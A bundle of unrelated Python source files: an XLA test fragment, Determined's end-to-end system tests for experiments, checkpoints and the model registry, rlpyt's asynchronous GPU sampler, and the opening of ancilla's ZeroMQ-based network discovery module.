extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).CompileWithExampleArguments([arg])
ans = compiled_c.ExecuteWithPythonValues([arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
unittest.main()
|
test_system.py
|
import json
import operator
import os
import subprocess
import tempfile
import threading
import time
from typing import Dict, Set
import botocore.exceptions
import numpy as np
import pytest
import yaml
from determined.common import check, storage
from determined.experimental import Determined, ModelSortBy
from tests import config as conf
from tests import experiment as exp
from tests.fixtures.metric_maker.metric_maker import structure_equal, structure_to_metrics
@pytest.mark.e2e_cpu # type: ignore
def test_trial_error() -> None:
exp.run_failure_test(
conf.fixtures_path("trial_error/const.yaml"),
conf.fixtures_path("trial_error"),
"NotImplementedError",
)
@pytest.mark.e2e_cpu # type: ignore
def test_invalid_experiment() -> None:
completed_process = exp.maybe_create_experiment(
conf.fixtures_path("invalid_experiment/const.yaml"), conf.cv_examples_path("mnist_tf")
)
assert completed_process.returncode != 0
@pytest.mark.e2e_cpu # type: ignore
def test_metric_gathering() -> None:
"""
Confirm that metrics are gathered from the trial the way that we expect.
"""
experiment_id = exp.run_basic_test(
conf.fixtures_path("metric_maker/const.yaml"), conf.fixtures_path("metric_maker"), 1
)
trials = exp.experiment_trials(experiment_id)
assert len(trials) == 1
# Read the structure of the metrics directly from the config file
config = conf.load_config(conf.fixtures_path("metric_maker/const.yaml"))
base_value = config["hyperparameters"]["starting_base_value"]
gain_per_batch = config["hyperparameters"]["gain_per_batch"]
training_structure = config["hyperparameters"]["training_structure"]["val"]
validation_structure = config["hyperparameters"]["validation_structure"]["val"]
scheduling_unit = 100
# Check training metrics.
full_trial_metrics = exp.trial_metrics(trials[0]["id"])
for step in full_trial_metrics["steps"]:
metrics = step["metrics"]
assert metrics["num_inputs"] == scheduling_unit
actual = metrics["batch_metrics"]
assert len(actual) == scheduling_unit
first_base_value = base_value + (step["id"] - 1) * scheduling_unit
batch_values = first_base_value + gain_per_batch * np.arange(scheduling_unit)
expected = [structure_to_metrics(value, training_structure) for value in batch_values]
assert structure_equal(expected, actual)
# Check validation metrics.
for step in trials[0]["steps"]:
validation = step["validation"]
metrics = validation["metrics"]
actual = metrics["validation_metrics"]
value = base_value + step["id"] * scheduling_unit
expected = structure_to_metrics(value, validation_structure)
assert structure_equal(expected, actual)
@pytest.mark.e2e_gpu # type: ignore
def test_gc_checkpoints_s3(secrets: Dict[str, str]) -> None:
config = exp.s3_checkpoint_config(secrets)
run_gc_checkpoints_test(config)
@pytest.mark.e2e_cpu # type: ignore
def test_gc_checkpoints_lfs() -> None:
run_gc_checkpoints_test(exp.shared_fs_checkpoint_config())
def run_gc_checkpoints_test(checkpoint_storage: Dict[str, str]) -> None:
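    # Each fixture pairs an experiment config with the checkpoint states expected
    # after GC, keyed by state with checkpoints identified by total_batches.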
fixtures = [
(
conf.fixtures_path("no_op/gc_checkpoints_decreasing.yaml"),
{"COMPLETED": {800, 900, 1000}, "DELETED": {100, 200, 300, 400, 500, 600, 700}},
),
(
conf.fixtures_path("no_op/gc_checkpoints_increasing.yaml"),
{"COMPLETED": {100, 200, 300, 900, 1000}, "DELETED": {400, 500, 600, 700, 800}},
),
]
all_checkpoints = []
for base_conf_path, result in fixtures:
config = conf.load_config(str(base_conf_path))
config["checkpoint_storage"].update(checkpoint_storage)
with tempfile.NamedTemporaryFile() as tf:
with open(tf.name, "w") as f:
yaml.dump(config, f)
experiment_id = exp.create_experiment(tf.name, conf.fixtures_path("no_op"))
exp.wait_for_experiment_state(experiment_id, "COMPLETED")
        # Checkpoints are not marked as deleted until the gc_checkpoint task starts.
retries = 5
for retry in range(retries):
trials = exp.experiment_trials(experiment_id)
assert len(trials) == 1
checkpoints = sorted(
(step["checkpoint"] for step in trials[0]["steps"]),
key=operator.itemgetter("total_batches"),
)
assert len(checkpoints) == 10
by_state = {} # type: Dict[str, Set[int]]
for checkpoint in checkpoints:
by_state.setdefault(checkpoint["state"], set()).add(checkpoint["total_batches"])
if by_state == result:
all_checkpoints.append((config, checkpoints))
break
if retry + 1 == retries:
assert by_state == result
time.sleep(1)
# Check that the actual checkpoint storage (for shared_fs) reflects the
# deletions. We want to wait for the GC containers to exit, so check
# repeatedly with a timeout.
max_checks = 30
for i in range(max_checks):
time.sleep(1)
try:
for config, checkpoints in all_checkpoints:
checkpoint_config = config["checkpoint_storage"]
if checkpoint_config["type"] == "shared_fs":
deleted_exception = check.CheckFailedError
elif checkpoint_config["type"] == "s3":
deleted_exception = botocore.exceptions.ClientError
else:
raise NotImplementedError(
f'unsupported storage type {checkpoint_config["type"]}'
)
storage_manager = storage.build(checkpoint_config, container_path=None)
for checkpoint in checkpoints:
metadata = storage.StorageMetadata.from_json(checkpoint)
if checkpoint["state"] == "COMPLETED":
with storage_manager.restore_path(metadata):
pass
elif checkpoint["state"] == "DELETED":
try:
with storage_manager.restore_path(metadata):
raise AssertionError("checkpoint not deleted")
except deleted_exception:
pass
except AssertionError:
if i == max_checks - 1:
raise
else:
break
@pytest.mark.e2e_cpu # type: ignore
def test_experiment_archive_unarchive() -> None:
experiment_id = exp.create_experiment(
conf.fixtures_path("no_op/single.yaml"), conf.fixtures_path("no_op"), ["--paused"]
)
describe_args = [
"det",
"-m",
conf.make_master_url(),
"experiment",
"describe",
"--json",
str(experiment_id),
]
# Check that the experiment is initially unarchived.
infos = json.loads(subprocess.check_output(describe_args))
assert len(infos) == 1
assert not infos[0]["archived"]
# Check that archiving a non-terminal experiment fails, then terminate it.
with pytest.raises(subprocess.CalledProcessError):
subprocess.check_call(
["det", "-m", conf.make_master_url(), "experiment", "archive", str(experiment_id)]
)
subprocess.check_call(
["det", "-m", conf.make_master_url(), "experiment", "cancel", str(experiment_id)]
)
# Check that we can archive and unarchive the experiment and see the expected effects.
subprocess.check_call(
["det", "-m", conf.make_master_url(), "experiment", "archive", str(experiment_id)]
)
infos = json.loads(subprocess.check_output(describe_args))
assert len(infos) == 1
assert infos[0]["archived"]
subprocess.check_call(
["det", "-m", conf.make_master_url(), "experiment", "unarchive", str(experiment_id)]
)
infos = json.loads(subprocess.check_output(describe_args))
assert len(infos) == 1
assert not infos[0]["archived"]
@pytest.mark.e2e_cpu # type: ignore
def test_create_test_mode() -> None:
# test-mode should succeed with a valid experiment.
command = [
"det",
"-m",
conf.make_master_url(),
"experiment",
"create",
"--test-mode",
conf.fixtures_path("mnist_pytorch/adaptive_short.yaml"),
conf.tutorials_path("mnist_pytorch"),
]
output = subprocess.check_output(command, universal_newlines=True)
assert "Model definition test succeeded" in output
# test-mode should fail when an error is introduced into the trial
# implementation.
command = [
"det",
"-m",
conf.make_master_url(),
"experiment",
"create",
"--test-mode",
conf.fixtures_path("trial_error/const.yaml"),
conf.fixtures_path("trial_error"),
]
with pytest.raises(subprocess.CalledProcessError):
subprocess.check_call(command)
@pytest.mark.e2e_cpu # type: ignore
def test_trial_logs() -> None:
experiment_id = exp.run_basic_test(
conf.fixtures_path("no_op/single.yaml"), conf.fixtures_path("no_op"), 1
)
trial_id = exp.experiment_trials(experiment_id)[0]["id"]
subprocess.check_call(["det", "-m", conf.make_master_url(), "trial", "logs", str(trial_id)])
subprocess.check_call(
["det", "-m", conf.make_master_url(), "trial", "logs", "--head", "10", str(trial_id)],
)
subprocess.check_call(
["det", "-m", conf.make_master_url(), "trial", "logs", "--tail", "10", str(trial_id)],
)
@pytest.mark.e2e_cpu # type: ignore
def test_labels() -> None:
experiment_id = exp.create_experiment(
conf.fixtures_path("no_op/single-one-short-step.yaml"), conf.fixtures_path("no_op"), None
)
label = "__det_test_dummy_label__"
# Add a label and check that it shows up.
subprocess.check_call(
["det", "-m", conf.make_master_url(), "e", "label", "add", str(experiment_id), label]
)
output = subprocess.check_output(
["det", "-m", conf.make_master_url(), "e", "describe", str(experiment_id)]
).decode()
assert label in output
# Remove the label and check that it doesn't show up.
subprocess.check_call(
["det", "-m", conf.make_master_url(), "e", "label", "remove", str(experiment_id), label]
)
output = subprocess.check_output(
["det", "-m", conf.make_master_url(), "e", "describe", str(experiment_id)]
).decode()
assert label not in output
@pytest.mark.e2e_cpu # type: ignore
def test_end_to_end_adaptive() -> None:
exp_id = exp.run_basic_test(
conf.fixtures_path("mnist_pytorch/adaptive_short.yaml"),
conf.tutorials_path("mnist_pytorch"),
None,
)
    # Check that the validation accuracy looks sane (more than 93% on MNIST).
trials = exp.experiment_trials(exp_id)
best = None
for trial in trials:
assert len(trial["steps"])
last_step = trial["steps"][-1]
accuracy = last_step["validation"]["metrics"]["validation_metrics"]["accuracy"]
if not best or accuracy > best:
best = accuracy
assert best is not None
assert best > 0.93
# Check that ExperimentReference returns a sorted order of top checkpoints
# without gaps. The top 2 checkpoints should be the first 2 of the top k
# checkpoints if sorting is stable.
d = Determined(conf.make_master_url())
exp_ref = d.get_experiment(exp_id)
top_2 = exp_ref.top_n_checkpoints(2)
top_k = exp_ref.top_n_checkpoints(
len(trials), sort_by="validation_loss", smaller_is_better=True
)
top_2_uuids = [c.uuid for c in top_2]
top_k_uuids = [c.uuid for c in top_k]
assert top_2_uuids == top_k_uuids[:2]
# Check that metrics are truly in sorted order.
metrics = [c.validation["metrics"]["validationMetrics"]["validation_loss"] for c in top_k]
assert metrics == sorted(metrics)
    # Check that flipping smaller_is_better reverses the checkpoint ordering.
top_k_reversed = exp_ref.top_n_checkpoints(
len(trials), sort_by="validation_loss", smaller_is_better=False
)
top_k_reversed_uuids = [c.uuid for c in top_k_reversed]
assert top_k_uuids == top_k_reversed_uuids[::-1]
checkpoint = top_k[0]
checkpoint.add_metadata({"testing": "metadata"})
db_check = d.get_checkpoint(checkpoint.uuid)
# Make sure the checkpoint metadata is correct and correctly saved to the db.
assert checkpoint.metadata == {"testing": "metadata"}
assert checkpoint.metadata == db_check.metadata
checkpoint.add_metadata({"some_key": "some_value"})
db_check = d.get_checkpoint(checkpoint.uuid)
assert checkpoint.metadata == {"testing": "metadata", "some_key": "some_value"}
assert checkpoint.metadata == db_check.metadata
checkpoint.add_metadata({"testing": "override"})
db_check = d.get_checkpoint(checkpoint.uuid)
assert checkpoint.metadata == {"testing": "override", "some_key": "some_value"}
assert checkpoint.metadata == db_check.metadata
checkpoint.remove_metadata(["some_key"])
db_check = d.get_checkpoint(checkpoint.uuid)
assert checkpoint.metadata == {"testing": "override"}
assert checkpoint.metadata == db_check.metadata
@pytest.mark.e2e_cpu # type: ignore
def test_model_registry() -> None:
exp_id = exp.run_basic_test(
conf.fixtures_path("mnist_pytorch/const-pytorch11.yaml"),
conf.tutorials_path("mnist_pytorch"),
None,
)
d = Determined(conf.make_master_url())
# Create a model and validate twiddling the metadata.
mnist = d.create_model("mnist", "simple computer vision model")
assert mnist.metadata == {}
mnist.add_metadata({"testing": "metadata"})
db_model = d.get_model("mnist")
# Make sure the model metadata is correct and correctly saved to the db.
assert mnist.metadata == db_model.metadata
assert mnist.metadata == {"testing": "metadata"}
mnist.add_metadata({"some_key": "some_value"})
db_model = d.get_model("mnist")
assert mnist.metadata == db_model.metadata
assert mnist.metadata == {"testing": "metadata", "some_key": "some_value"}
mnist.add_metadata({"testing": "override"})
db_model = d.get_model("mnist")
assert mnist.metadata == db_model.metadata
assert mnist.metadata == {"testing": "override", "some_key": "some_value"}
mnist.remove_metadata(["some_key"])
db_model = d.get_model("mnist")
assert mnist.metadata == db_model.metadata
assert mnist.metadata == {"testing": "override"}
# Register a version for the model and validate the latest.
checkpoint = d.get_experiment(exp_id).top_checkpoint()
model_version = mnist.register_version(checkpoint.uuid)
assert model_version.model_version == 1
latest_version = mnist.get_version()
assert latest_version is not None
assert latest_version.uuid == checkpoint.uuid
# Run another basic test and register its checkpoint as a version as well.
# Validate the latest has been updated.
exp_id = exp.run_basic_test(
conf.fixtures_path("mnist_pytorch/const-pytorch11.yaml"),
conf.tutorials_path("mnist_pytorch"),
None,
)
checkpoint = d.get_experiment(exp_id).top_checkpoint()
model_version = mnist.register_version(checkpoint.uuid)
assert model_version.model_version == 2
latest_version = mnist.get_version()
assert latest_version is not None
assert latest_version.uuid == checkpoint.uuid
# Ensure the correct number of versions are present.
all_versions = mnist.get_versions()
assert len(all_versions) == 2
# Create some more models and validate listing models.
d.create_model("transformer", "all you need is attention")
d.create_model("object-detection", "a bounding box model")
models = d.get_models(sort_by=ModelSortBy.NAME)
assert [m.name for m in models] == ["mnist", "object-detection", "transformer"]
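# A small helper sketch (illustration only, not part of the test suite; the
# function name is hypothetical): it strings together the SDK calls exercised
# in test_model_registry above to register an experiment's best checkpoint as
# a new version of a named model.
def _register_best_checkpoint(master_url: str, experiment_id: int, model_name: str) -> int:
    d = Determined(master_url)
    checkpoint = d.get_experiment(experiment_id).top_checkpoint()
    model = d.get_model(model_name)
    version = model.register_version(checkpoint.uuid)
    return version.model_version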
@pytest.mark.e2e_cpu # type: ignore
def test_log_null_bytes() -> None:
config_obj = conf.load_config(conf.fixtures_path("no_op/single.yaml"))
config_obj["hyperparameters"]["write_null"] = True
config_obj["max_restarts"] = 0
config_obj["searcher"]["max_length"] = {"batches": 1}
experiment_id = exp.run_basic_test_with_temp_config(config_obj, conf.fixtures_path("no_op"), 1)
trials = exp.experiment_trials(experiment_id)
assert len(trials) == 1
logs = exp.trial_logs(trials[0]["id"])
assert len(logs) > 0
@pytest.mark.e2e_cpu # type: ignore
def test_graceful_trial_termination() -> None:
config_obj = conf.load_config(conf.fixtures_path("no_op/grid-graceful-trial-termination.yaml"))
exp.run_basic_test_with_temp_config(config_obj, conf.fixtures_path("no_op"), 2)
@pytest.mark.e2e_gpu # type: ignore
def test_s3_no_creds(secrets: Dict[str, str]) -> None:
pytest.skip("Temporarily skipping this until we find a more secure way of testing this.")
config = conf.load_config(conf.tutorials_path("mnist_pytorch/const.yaml"))
config["checkpoint_storage"] = exp.s3_checkpoint_config_no_creds()
config.setdefault("environment", {})
config["environment"].setdefault("environment_variables", [])
config["environment"]["environment_variables"] += [
f"AWS_ACCESS_KEY_ID={secrets['INTEGRATIONS_S3_ACCESS_KEY']}",
f"AWS_SECRET_ACCESS_KEY={secrets['INTEGRATIONS_S3_SECRET_KEY']}",
]
exp.run_basic_test_with_temp_config(config, conf.tutorials_path("mnist_pytorch"), 1)
@pytest.mark.parallel # type: ignore
def test_pytorch_parallel() -> None:
config = conf.load_config(conf.tutorials_path("mnist_pytorch/const.yaml"))
config = conf.set_slots_per_trial(config, 8)
config = conf.set_max_length(config, {"batches": 200})
config = conf.set_tensor_auto_tuning(config, True)
config = conf.set_perform_initial_validation(config, True)
exp_id = exp.run_basic_test_with_temp_config(
config, conf.tutorials_path("mnist_pytorch"), 1, has_zeroth_step=True
)
exp.assert_performed_initial_validation(exp_id)
@pytest.mark.e2e_cpu # type: ignore
def test_fail_on_first_validation() -> None:
error_log = "failed on first validation"
config_obj = conf.load_config(conf.fixtures_path("no_op/single.yaml"))
config_obj["hyperparameters"]["fail_on_first_validation"] = error_log
exp.run_failure_test_with_temp_config(
config_obj,
conf.fixtures_path("no_op"),
error_log,
)
@pytest.mark.e2e_cpu # type: ignore
def test_fail_on_checkpoint_save() -> None:
error_log = "failed on checkpoint save"
config_obj = conf.load_config(conf.fixtures_path("no_op/single.yaml"))
config_obj["hyperparameters"]["fail_on_chechpoint_save"] = error_log
exp.run_failure_test_with_temp_config(
config_obj,
conf.fixtures_path("no_op"),
error_log,
)
@pytest.mark.e2e_cpu # type: ignore
def test_fail_on_preclose_checkpoint_save() -> None:
error_log = "failed on checkpoint save"
config_obj = conf.load_config(conf.fixtures_path("no_op/single.yaml"))
config_obj["hyperparameters"]["fail_on_chechpoint_save"] = error_log
config_obj["searcher"]["max_length"] = {"batches": 1}
config_obj["min_validation_period"] = {"batches": 1}
config_obj["max_restarts"] = 1
exp.run_failure_test_with_temp_config(
config_obj,
conf.fixtures_path("no_op"),
error_log,
)
@pytest.mark.e2e_cpu # type: ignore
def test_perform_initial_validation() -> None:
config = conf.load_config(conf.fixtures_path("no_op/single.yaml"))
config = conf.set_max_length(config, {"batches": 1})
config = conf.set_perform_initial_validation(config, True)
exp_id = exp.run_basic_test_with_temp_config(
config, conf.fixtures_path("no_op"), 1, has_zeroth_step=True
)
exp.assert_performed_initial_validation(exp_id)
@pytest.mark.parallel # type: ignore
def test_distributed_logging() -> None:
config = conf.load_config(conf.fixtures_path("pytorch_no_op/const.yaml"))
config = conf.set_slots_per_trial(config, 8)
config = conf.set_max_length(config, {"batches": 1})
e_id = exp.run_basic_test_with_temp_config(config, conf.fixtures_path("pytorch_no_op"), 1)
t_id = exp.experiment_trials(e_id)[0]["id"]
for i in range(config["resources"]["slots_per_trial"]):
assert exp.check_if_string_present_in_trial_logs(
t_id, "finished train_batch for rank {}".format(i)
)
@pytest.mark.e2e_cpu # type: ignore
def test_disable_and_enable_slots() -> None:
command = [
"det",
"-m",
conf.make_master_url(),
"slot",
"list",
"--json",
]
output = subprocess.check_output(command).decode()
slots = json.loads(output)
assert len(slots) == 1
command = [
"det",
"-m",
conf.make_master_url(),
"slot",
"disable",
slots[0]["agent_id"],
slots[0]["slot_id"],
]
subprocess.check_call(command)
command = [
"det",
"-m",
conf.make_master_url(),
"slot",
"enable",
slots[0]["agent_id"],
slots[0]["slot_id"],
]
subprocess.check_call(command)
@pytest.mark.parallel # type: ignore
@pytest.mark.timeout(300) # type: ignore
def test_gang_scheduling() -> None:
total_slots = os.getenv("TOTAL_SLOTS")
if total_slots is None:
pytest.skip("test requires a static cluster and TOTAL_SLOTS set in the environment")
config = conf.load_config(conf.tutorials_path("mnist_pytorch/distributed.yaml"))
config = conf.set_slots_per_trial(config, int(total_slots))
model = conf.tutorials_path("mnist_pytorch")
def submit_job() -> None:
ret_value = exp.run_basic_test_with_temp_config(config, model, 1)
print(ret_value)
t = []
for _i in range(2):
t.append(threading.Thread(target=submit_job))
for i in range(2):
t[i].start()
for i in range(2):
t[i].join()
gpu_sampler.py
import ctypes
import multiprocessing as mp
import psutil
import torch
from rlpyt.agents.base import AgentInputs
from rlpyt.samplers.async_.action_server import AsyncActionServer
from rlpyt.samplers.async_.base import AsyncParallelSamplerMixin
from rlpyt.samplers.async_.collectors import DbGpuResetCollector
from rlpyt.samplers.parallel.base import ParallelSamplerBase
from rlpyt.samplers.parallel.gpu.collectors import GpuEvalCollector
from rlpyt.samplers.parallel.gpu.sampler import GpuSamplerBase, build_step_buffer
from rlpyt.samplers.parallel.worker import sampling_process
from rlpyt.utils.collections import AttrDict
from rlpyt.utils.logging import logger
from rlpyt.utils.seed import make_seed
class AsyncGpuSamplerBase(AsyncParallelSamplerMixin, ParallelSamplerBase):
"""Main definitions for asynchronous parallel sampler using GPU(s) for
action selection. The main sampler process (forked from the overall
master) forks action-server processes, one per GPU to be used, and
the action-server process(es) fork their own parallel CPU workers.
This same sampler object is used in the main sampler process and in
the action server process(es), but for different methods, labeled by
comments in the code (easier way to pass arguments along).
"""
def __init__(
self,
*args,
CollectorCls=DbGpuResetCollector,
eval_CollectorCls=GpuEvalCollector,
**kwargs,
):
super().__init__(
*args,
CollectorCls=CollectorCls,
eval_CollectorCls=eval_CollectorCls,
**kwargs,
)
##########################################
# In forked sampler runner process.
##########################################
def initialize(self, affinity):
"""Initialization inside the main sampler process. Builds one level
of parallel synchronization objects, and forks action-server processes,
one per GPU to be used.
"""
torch.set_num_threads(1) # Needed to avoid MKL hang :( .
self.world_size = n_server = len(affinity)
n_envs_lists = self._get_n_envs_lists(affinity)
n_server = len(n_envs_lists)
n_worker = sum([len(n_envs_list) for n_envs_list in n_envs_lists])
self.n_worker = n_worker
if self.eval_n_envs > 0:
self.eval_n_envs_per = max(1, self.eval_n_envs // n_worker)
self.eval_n_envs = eval_n_envs = self.eval_n_envs_per * n_worker
logger.log(f"Total parallel evaluation envs: {eval_n_envs}.")
self.eval_max_T = eval_max_T = int(self.eval_max_steps // eval_n_envs)
self._build_parallel_ctrl(n_server, n_worker)
servers_kwargs = self._assemble_servers_kwargs(
affinity, self.seed, n_envs_lists
)
servers = [
mp.Process(target=self.action_server_process, kwargs=s_kwargs)
for s_kwargs in servers_kwargs
]
for s in servers:
s.start()
self.servers = servers
self.ctrl.barrier_out.wait() # Wait for workers to decorrelate envs.
# obtain_samples() and evaluate_agent() remain the same.
def shutdown(self):
self.ctrl.quit.value = True
self.ctrl.barrier_in.wait()
for s in self.servers:
s.join()
def _get_n_envs_lists(self, affinity):
B = self.batch_spec.B
n_server = len(affinity)
n_workers = [len(aff["workers_cpus"]) for aff in affinity]
if B < n_server:
raise ValueError(
f"Request fewer envs ({B}) than action servers " f"({n_server})."
)
server_Bs = [B // n_server] * n_server
if n_workers.count(n_workers[0]) != len(n_workers):
logger.log(
"WARNING: affinity requested different number of "
"environment workers per action server, but environments "
"will be assigned equally across action servers anyway."
)
if B % n_server > 0:
for s in range(B % n_server):
server_Bs[s] += 1 # Spread across action servers.
n_envs_lists = list()
for s_worker, s_B in zip(n_workers, server_Bs):
n_envs_lists.append(self._get_n_envs_list(n_worker=s_worker, B=s_B))
return n_envs_lists
def _build_parallel_ctrl(self, n_server, n_worker):
super()._build_parallel_ctrl(n_worker + n_server)
def _assemble_servers_kwargs(self, affinity, seed, n_envs_lists):
servers_kwargs = list()
i_env = 0
i_worker = 0
for rank in range(len(affinity)):
n_worker = len(affinity[rank]["workers_cpus"])
n_env = sum(n_envs_lists[rank])
slice_B = slice(i_env, i_env + n_env)
server_kwargs = dict(
rank=rank,
env_ranks=list(range(i_env, i_env + n_env)),
double_buffer_slice=tuple(
buf[:, slice_B] for buf in self.double_buffer
),
affinity=affinity[rank],
n_envs_list=n_envs_lists[rank],
seed=seed + i_worker,
)
servers_kwargs.append(server_kwargs)
i_worker += n_worker
i_env += n_env
return servers_kwargs
############################################
# In action server processes (forked again).
############################################
def action_server_process(
self, rank, env_ranks, double_buffer_slice, affinity, seed, n_envs_list
):
"""Target method used for forking action-server process(es) from the
main sampler process. By inheriting the sampler object from the
sampler process, can more easily pass args to the environment worker
processes, which are forked from here.
Assigns hardware affinity, and then forks parallel worker processes
and moves agent model to device. Then enters infinite loop: waits for
signals from main sampler process to collect training samples or
perform evaluation, and then serves actions during collection. At
every loop, calls agent to retrieve new parameter values from the
training process, which are communicated through shared CPU memory.
"""
self.rank = rank
p = psutil.Process()
if affinity.get("set_affinity", True):
p.cpu_affinity(affinity["master_cpus"])
# torch.set_num_threads(affinity["master_torch_threads"])
torch.set_num_threads(1) # Possibly needed to avoid MKL hang.
self.launch_workers(double_buffer_slice, affinity, seed, n_envs_list)
self.agent.to_device(cuda_idx=affinity["cuda_idx"])
self.agent.collector_initialize(
global_B=self.batch_spec.B, env_ranks=env_ranks # Not updated.
) # For vector eps-greedy.
self.ctrl.barrier_out.wait() # Wait for workers to decorrelate envs.
while True:
self.sync.stop_eval.value = False # Reset.
self.ctrl.barrier_in.wait()
if self.ctrl.quit.value:
break
self.agent.recv_shared_memory()
if self.ctrl.do_eval.value:
self.agent.eval_mode(self.ctrl.itr.value)
self.serve_actions_evaluation(self.ctrl.itr.value)
else:
self.agent.sample_mode(self.ctrl.itr.value)
# Only for bootstrap_value:
self.samples_np = self.double_buffer[self.ctrl.db_idx.value]
if hasattr(self, "double_bootstrap_value_pair"): # Alternating sampler.
self.bootstrap_value_pair = self.double_bootstrap_value_pair[
self.ctrl.db_idx.value
]
self.serve_actions(self.ctrl.itr.value)
self.ctrl.barrier_out.wait()
self.shutdown_workers()
def launch_workers(self, double_buffer_slice, affinity, seed, n_envs_list):
self.n_worker = n_worker = len(n_envs_list)
# A little sleight-of-hand to make a 2-level signal:
self.ctrl.stop_eval = self.sync.stop_eval
self.sync = AttrDict(
obs_ready=[mp.Semaphore(0) for _ in range(n_worker)],
act_ready=[mp.Semaphore(0) for _ in range(n_worker)],
stop_eval=mp.RawValue(ctypes.c_bool, False), # Overwrite.
# stop_eval=self.ctrl.stop_eval, # No, make 2-level signal.
db_idx=self.ctrl.db_idx, # Copy into sync which passes to Collector.
)
self.step_buffer_pyt, self.step_buffer_np = build_step_buffer(
self.examples, sum(n_envs_list)
)
self.agent_inputs = AgentInputs(
self.step_buffer_pyt.observation,
self.step_buffer_pyt.action,
self.step_buffer_pyt.reward,
)
if self.eval_n_envs > 0:
eval_n_envs = self.eval_n_envs_per * n_worker
eval_step_buffer_pyt, eval_step_buffer_np = build_step_buffer(
self.examples, eval_n_envs
)
self.eval_step_buffer_pyt = eval_step_buffer_pyt
self.eval_step_buffer_np = eval_step_buffer_np
self.eval_agent_inputs = AgentInputs(
self.eval_step_buffer_pyt.observation,
self.eval_step_buffer_pyt.action,
self.eval_step_buffer_pyt.reward,
)
# eval_max_T already made in earlier initialize.
self.double_buffer = double_buffer_slice # Now only see my part.
common_kwargs = self._assemble_common_kwargs(affinity)
common_kwargs["agent"] = None # Remove.
workers_kwargs = self._assemble_workers_kwargs(affinity, seed, n_envs_list)
# Yes, fork again.
self.workers = [
mp.Process(
target=sampling_process,
kwargs=dict(common_kwargs=common_kwargs, worker_kwargs=w_kwargs),
)
for w_kwargs in workers_kwargs
]
for w in self.workers:
w.start()
def shutdown_workers(self):
for w in self.workers:
w.join() # Already signaled to quit by central master.
def _assemble_workers_kwargs(self, affinity, seed, n_envs_list):
workers_kwargs = super()._assemble_workers_kwargs(affinity, seed, n_envs_list)
i_env = 0
for rank, w_kwargs in enumerate(workers_kwargs):
n_envs = n_envs_list[rank]
slice_B = slice(i_env, i_env + n_envs)
w_kwargs["sync"] = AttrDict(
stop_eval=self.sync.stop_eval,
obs_ready=self.sync.obs_ready[rank],
act_ready=self.sync.act_ready[rank],
db_idx=self.sync.db_idx,
)
w_kwargs["step_buffer_np"] = self.step_buffer_np[slice_B]
if self.eval_n_envs > 0:
eval_slice_B = slice(
self.eval_n_envs_per * rank, self.eval_n_envs_per * (rank + 1)
)
w_kwargs["eval_step_buffer_np"] = self.eval_step_buffer_np[eval_slice_B]
i_env += n_envs
return workers_kwargs
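# Minimal sketch (illustration only; names are hypothetical; assumes the
# 'fork' start method, the Linux default, so workers inherit ctrl by
# reference) of the two-barrier handshake AsyncGpuSamplerBase relies on: the
# master publishes shared control values, releases everyone through
# barrier_in, and collects them again at barrier_out once the iteration's
# work is done.
def _barrier_handshake_sketch(n_workers=2, n_itrs=3):
    ctrl = AttrDict(
        quit=mp.RawValue(ctypes.c_bool, False),
        itr=mp.RawValue(ctypes.c_long, 0),
        barrier_in=mp.Barrier(n_workers + 1),
        barrier_out=mp.Barrier(n_workers + 1),
    )

    def worker():
        while True:
            ctrl.barrier_in.wait()   # wait for the master to publish work
            if ctrl.quit.value:
                break                # exit without touching barrier_out
            _ = ctrl.itr.value       # ...one iteration of work would go here...
            ctrl.barrier_out.wait()  # report completion back to the master

    procs = [mp.Process(target=worker) for _ in range(n_workers)]
    for p in procs:
        p.start()
    for itr in range(n_itrs):
        ctrl.itr.value = itr
        ctrl.barrier_in.wait()       # release the workers for this iteration
        ctrl.barrier_out.wait()      # wait until they have all finished
    ctrl.quit.value = True
    ctrl.barrier_in.wait()           # wake the workers so they can see quit
    for p in procs:
        p.join()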
class AsyncGpuSampler(AsyncActionServer, AsyncGpuSamplerBase):
pass
discovery.py
'''
discovery.py
ancilla
Created by Kevin Musselman (kevin@frenzylabs.com) on 01/14/20
Copyright 2019 FrenzyLabs, LLC.
'''
import time
import uuid
from threading import Thread
import threading
import zmq
# from zmq.eventloop.ioloop import PeriodicCallback
from zmq.eventloop.zmqstream import ZMQStream
from tornado.ioloop import IOLoop, PeriodicCallback
import asyncio
from tornado.platform.asyncio import AnyThreadEventLoopPolicy
import json
import socket
import netifaces
from functools import partial
from .udp import UDP
from ...utils.service_json_encoder import ServiceJsonEncoder
from ..response import AncillaError
from ...data.models import Node
from .beacon import Beacon
# =====================================================================
# Synchronous part, works in our application thread
def pipe(ctx):
"""create an inproc PAIR pipe"""
a = ctx.socket(zmq.PAIR)
b = ctx.socket(zmq.PAIR)
url = "inproc://%s" % uuid.uuid1()
a.bind(url)
b.connect(url)
return a, b
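# Usage sketch for pipe() (illustration only; names here are hypothetical):
# the two PAIR sockets form an in-process channel, so the application thread
# can exchange multipart messages with a background agent thread, which is
# exactly how Discovery hands one end of each pipe to DiscoveryAgent below.
def _pipe_usage_example():
    ctx = zmq.Context()
    app_end, agent_end = pipe(ctx)
    worker = Thread(target=lambda: agent_end.send_multipart([b'hello']), daemon=True)
    worker.start()
    reply = app_end.recv_multipart()  # -> [b'hello']
    worker.join()
    app_end.close()
    agent_end.close()
    ctx.term()
    return reply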
class Discovery(object):
"""Interface class.
Just starts a UDP ping agent in a background thread."""
ctx = None # Our context
pipe = None # Pipe through to agent
requestpipe = None
beacon = None
agent_thread = None
agent = None
networkcb = None
nodecb = None
# current_address = None
broadcast = None
def __init__(self, node):
self._current_address = None
self.cached_peers = []
self.node = node
self.update_beacon_timeout = None
self.current_address, self.broadcast = self.check_interface_addresses()
self.beacon = Beacon(self.node.name, port=self.node.api_port, address=self.current_address)
# self.beacon.address = self.current_address
self.networkcb = PeriodicCallback(self.check_network, PING_INTERVAL * 2000, 0.2)
self.nodecb = PeriodicCallback(self.check_nodes, PING_INTERVAL * 4000, 0.1)
self.run(self.node.settings.discovery)
@property
def current_address(self):
if not self._current_address:
return '127.0.0.1'
else:
return self._current_address
@current_address.setter
def current_address(self, val):
self._current_address = val
def run(self, val):
if val:
self.start()
else:
self.stop()
def stop(self):
print(f"Stop Discovery", flush=True)
self.stop_checking()
self.networkcb.stop()
if self.update_beacon_timeout:
self.update_beacon_timeout.cancel()
self.cached_peers = []
if self.beacon:
self.beacon.close()
print(f"Closed Beacon", flush=True)
if self.pipe:
self.pipe.close()
